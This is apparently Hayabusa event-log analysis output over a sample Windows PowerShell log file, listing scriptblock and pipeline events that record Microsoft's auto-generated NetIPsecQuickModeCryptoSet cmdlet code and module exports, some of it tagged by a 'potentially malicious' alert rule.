(@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral 
Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 
'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 
$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') 
} if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent 
= $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw 
} } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.661 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.661 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.662 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.662 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.662 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and 
